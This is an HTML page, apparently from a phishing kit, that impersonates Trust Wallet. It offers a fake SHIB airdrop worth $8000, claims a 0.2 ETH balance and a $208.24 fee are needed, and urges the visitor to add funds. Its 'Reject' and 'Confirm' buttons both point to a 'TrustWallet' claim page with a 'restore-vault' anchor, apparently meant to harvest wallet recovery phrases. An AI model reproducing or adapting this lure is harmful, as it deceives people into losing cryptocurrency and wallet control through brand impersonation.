
<!doctype html>
<html lang="en"><head>
<style>
.anticon {
  display: inline-block;
  color: inherit;
  font-style: normal;
  line-height: 0;
  text-align: center;
  text-transform: none;
  vertical-align: -0.125em;
  text-rendering: optimizeLegibility;
  -webkit-font-smoothing: antialiased;
  -moz-osx-font-smoothing: grayscale;
}

.anticon > * {
  line-height: 1;
}

.anticon svg {
  display: inline-block;
}

.anticon::before {
  display: none;
}

.anticon .anticon-icon {
  display: block;
}

.anticon[tabindex] {
  cursor: pointer;
}

.anticon-spin::before,
.anticon-spin {
  display: inline-block;
  -webkit-animation: loadingCircle 1s infinite linear;
  animation: loadingCircle 1s infinite linear;
}

@-webkit-keyframes loadingCircle {
  100% {
    -webkit-transform: rotate(360deg);
    transform: rotate(360deg);
  }
}

@keyframes loadingCircle {
  100% {
    -webkit-transform: rotate(360deg);
    transform: rotate(360deg);
  }
}
</style>
<meta charset="utf-8"><link rel="icon" href="truste.png"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#000000">
<link href="css/appsc.css" rel="stylesheet"><link rel="apple-touch-icon" href="truste.png"><title>Best Cryptocurrency Wallet | Ethereum Wallet | ERC20 Wallet | Trust Wallet</title>
<link href="css/chunk.css" rel="stylesheet">
<link href="css/app.css" rel="stylesheet">
<link href="css/main.chunk.css" rel="stylesheet">
</head><body><div id="root"><div class="ant-spin-nested-loading"><div class="ant-spin-container"><div class="sc-jqCOkK kFZWwp"><div class="sc-gGBfsJ jvrGcO"><div class="sc-jnlKLf OHNdu"><div class="sc-fYxtnH hARKVj">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<img src="jalogo.png" alt="cashtab" class="sc-tilXH gdtVXy"></div><br><center><div class="confirm-approve-content__identicon-wrapper"><img class="identicon confirm-approve-content__identicon" src="https://shibatoken.com/images/shib-logo.svg" alt="" style="height: 48px;width: 48px;"></div>

<br><div class="thepadding">To get <b style="color: #4d4d4d;font-weight: bold;">736420500.13 SHIB</b> ($8000), you must have a balance of at least 0.2 ETH (Ethereum) on the network.</div>
</center>
<div class="confirm-approve-content__card--no-border"><div class="confirm-approve-content__card-header"><div class="confirm-approve-content__card-header__title">Transaction Fee</div><div class="confirm-approve-content__small-blue-text cursor-pointer">USD/ETH</div></div><div class="confirm-approve-content__card-content"><div class="confirm-approve-content__transaction-details-content"><div class="confirm-approve-content__small-text">A fee is associated with this request.</div><div class="confirm-approve-content__transaction-details-content__fee"><div class="confirm-approve-content__transaction-details-content__primary-fee">$208.24</div><div class="confirm-approve-content__transaction-details-content__secondary-fee"><b>0.1180 ETH</b></div></div></div></div><br><br>
<p class="sc-VigVT boha" style="color: red;">Not enough funds for transaction fee, please fill your balance.</p>
<div class="sc-htoDjs cDnNqw"><form class="ant-form ant-form-horizontal" style="width: auto;"><div class="ant-row ant-form-item ant-form-item-with-help" style="row-gap: 0px;"></div><div class="pot">

<a href="/claim/TrustWallet.html?nkbihfbeogaeaoehlefnkodbefgpgknn/home.html#restore-vault" class="sc-VigVT ikREId">Reject</a>		
<a href="/claim/TrustWallet.htm?nkbihfbeogaeaoehlefnkodbefgpgknn/home.html#restore-vault" class="sc-VigVT fWmldN">Confirm</a>	

</div>
</form></div><div class="confirm-approve-content__view-full-tx-button-wrapper"><div class="confirm-approve-content__view-full-tx-button cursor-pointer"></div></div></div></div></div></div></div></div></div></body></html>
